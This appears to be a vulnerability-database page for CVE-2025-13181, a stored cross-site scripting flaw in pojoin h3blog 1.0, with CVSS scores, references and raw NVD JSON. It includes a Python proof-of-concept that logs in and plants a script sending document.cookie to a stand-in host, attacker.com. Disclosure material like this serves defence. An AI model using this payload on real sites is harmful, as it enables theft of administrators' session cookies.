CVE-2025-13181

Description

A vulnerability was determined in pojoin h3blog 1.0. The affected element is an unknown function of the file /admin/cms/material/add. Executing a manipulation of the argument Name can lead to cross site scripting. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:h3blog:h3blog:1.0.0:*:*:*:*:*:*:* - VULNERABLE

pojoin h3blog 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys
from urllib.parse import quote

# CVE-2025-13181 PoC - Stored XSS in pojoin h3blog 1.0
# Target: /admin/cms/material/add
# Parameter: Name

def exploit_xss(target_url, username, password):
    """
    Exploit stored XSS vulnerability in pojoin h3blog 1.0
    """
    login_url = f"{target_url}/admin/login"
    upload_url = f"{target_url}/admin/cms/material/add"
    
    # XSS Payload - Cookie stealing example
    xss_payload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>'
    
    # Step 1: Login to admin panel
    session = requests.Session()
    login_data = {
        'username': username,
        'password': password
    }
    
    try:
        login_response = session.post(login_url, data=login_data)
        
        # Step 2: Upload material with XSS payload in Name field
        upload_data = {
            'Name': xss_payload,
            'Type': 'image',
            'Description': 'Test material'
        }
        
        upload_response = session.post(upload_url, data=upload_data)
        
        if upload_response.status_code == 200:
            print(f"[+] XSS Payload submitted successfully")
            print(f"[+] Payload: {xss_payload}")
            print(f"[+] When admin views material list, script will execute")
        else:
            print(f"[-] Upload failed with status: {upload_response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} http://localhost:8080 admin admin123")
        sys.exit(1)
    
    exploit_xss(sys.argv[1], sys.argv[2], sys.argv[3])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13181
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13181
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13181/
[4] VulDB https://vuldb.com/cve/CVE-2025-13181
[5] https://github.com/caigo8/CVE-md/blob/main/h3blog/xss4.md
[6] https://github.com/caigo8/CVE-md/blob/main/h3blog/xss4.md#vulnerability-reproduction
[7] https://vuldb.com/?ctiid.332471
[8] https://vuldb.com/?id.332471
[9] https://vuldb.com/?submit.684887

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13181", "sourceIdentifier": "[email protected]", "published": "2025-11-14T20:15:46.660", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in pojoin h3blog 1.0. The affected element is an unknown function of the file /admin/cms/material/add. Executing a manipulation of the argument Name can lead to cross site scripting. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:h3blog:h3blog:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "EFA49FAA-64DA-4C5D-ABE2-6989683A59B1"}]}]}], "references": [{"url": "https://github.com/caigo8/CVE-md/blob/main/h3blog/xss4.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/caigo8/CVE-md/blob/main/h3blog/xss4.md#vulnerability-reproduction", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332471", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332471", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.684887", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}